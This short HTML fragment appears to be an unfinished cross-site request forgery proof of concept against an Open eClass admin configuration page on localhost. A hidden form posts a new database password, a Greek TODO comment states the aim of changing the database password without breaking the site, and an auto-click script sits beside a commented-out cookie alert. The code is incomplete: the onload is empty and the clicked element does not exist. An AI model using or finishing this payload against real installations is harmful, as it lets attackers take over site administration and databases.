<body onload=''>
<form method="POST" action="http://localhost:1180/modules/admin/eclassconf.php">

<input class="FormData_InputText" type="password" name="formmysqlPassword" size="40" value="123"></form>

/********************************************************* 
TODO:: να συμπληρωσω τα υπολοιπα στοιχεια της φορμας και να δοκιμασω αν γινεται να αλλαξει ο κωδικος της βασης χωρις να "πεσει" το υπολοιπο σαιτ 
********************************************************/




<script type="text/javascript">
      function boomboom() {
        document.getElementById("boom").click();

        // alert(document.cookie);

      }
</script>

